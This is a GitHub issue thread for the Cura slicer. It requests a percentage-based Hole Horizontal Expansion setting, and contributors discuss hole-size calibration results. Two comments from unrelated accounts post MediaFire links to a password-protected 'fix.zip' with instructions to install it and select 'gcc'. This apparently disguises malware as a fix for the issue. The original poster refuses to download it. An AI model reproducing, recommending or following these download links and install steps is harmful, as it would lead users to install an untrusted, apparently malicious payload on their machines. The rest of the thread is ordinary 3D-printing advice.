Ultimaker/Cura #19591: Add option to set the Hole Horizontal Expansion in %

PartySausage, 2024-08-28:
### Is your feature request related to a problem?

The Hole Horizontal Expansion feature setting is very good & I've found it beneficial; However I've also found it does have it's limitations when printing holes of different sizes.
I recently had a need to create a print with holes of different sizes with the intention to run a tap through them for a light duty fixings.
I found that defining the Hole Horizontal Expansion as 0,2mm worked really well for the M5-6 holes, however the M2-2.5 holes were oversized & couldn't be tapped

### Describe the solution you'd like

My solution/request would be to add the ability to set the Hole Horizontal Expansion as a % in addition to mm, which would give a more uniform increase in different hole sizes. 
This setting would be mutually exclusive as in other settings where they can be defined in mm of No. of Lines

### Describe alternatives you've considered

I could have compensated for this in the CAD S/W however in this case I compensated by leaving the Hole Horizontal Expansion at zero & increasing the no. of walls around the holes, which made the smaller holes closer to the correct dimensions at the expense of the larger holes being smaller than required; then enlarged each hole to the correct tapping size with drills of  an appropriate size

### Affected users and/or printers

All users

cnhbliyou, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

PartySausage, 2024-08-28:
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

I am not downloading anything & installing it on my PC are you mad!

GregValiant, 2024-08-28:
@PartySausage I designed a hole chart with diameters from 2mm to 30mm for a study of the effect of Hole Horizontal Expansion (HHE) on the diameters.  What I found was that the necessary amount of HHE was directly related to the size of the holes.  Starting at 2mm, 0.20 worked well, at 15-20mm diameter the required HHE fell to 0.10 and at 30mm diameter no HHE was required.  The decline in the amount of HHE required (for dimensionally accurate holes) was fairly close to linear.
My theory is that at larger diameters the extrusions stay where they were put rather than dragging in towards the center of the hole.  The "resolution" of the model would also come into play.  A low resolution model with larger facets actually prints holes better as the longer extrusions don't pull towards the center.
I just don't think a percentage would work well.

I'm working on a project now that I wanted to adjust the diameter of a counterbore only, (not the through hole).  Although HHE can be set per model, I'm not able to adjust the HHE of an area of a model using a mesh modifier.

PartySausage, 2024-08-28:
Quite interesting although I should hardly be surprised how different printers respond to the similar settings. It is also entirely possible that I cocked-up something with my dimensions, which led to my results & conclusions.
The M5 & M6 holes I printed with a 0.2 HHE came out fine & accepted the thread no problem, whereas with the M2.5 hole the tap didn't touch the sides.
I think I'm going to have to perform a more controlled hole test myself & see how that turns out.... Looks like there's a suitable model in the Cura calibration parts plugin so I'll have a play with that with different HHE settings

GregValiant, 2024-08-28:
It's usually the small holes that are the issue.  The nozzle comes back around so fast that the next wall is going down before the first one hardened.  That just drags the molten plastic into the middle and the hole gets smaller.  It's odd that yours got bigger, and quite a bit bigger at that.

PartySausage, 2024-08-28:
Yes that's the results I would expect, which adds some more credibility to the 'I may have screwed something up" 
It was a quick print I needed to knock up & I wasn't as meticulous with my due diligence so I think a hole test is the way to go

PartySausage, 2024-08-30:
@GregValiant I've done a couple of hole tests with different HHE values for holes in the range 1mm-15mm using the hole test calibration part file available in Cura with the same petg filament I'd used when I raised my initial request
The results showed that on my E3 S1 Pro; A HHE value of 0.1mm gave the most accurate holes on both the X & Y axes across all the holes so I think what I'd originally seen was down to finger troubles rather than anything else so I'll close this one out

closed 2024-08-30 by PartySausage

GregValiant, 2024-08-30:
I design 99% of what I print and I've taken to putting the HHE into the CAD model.  Not everyone can do that of course, but it's hard to make a flat statement like "10% HHE always works", or "0.2mm HHE always works".  The material comes into play as well as the model geometry.  I think HHE will remain a moving target and something that the user will need to figure out.  About 1/2 the time I just run a drill into the hole anyway and that way I know for sure.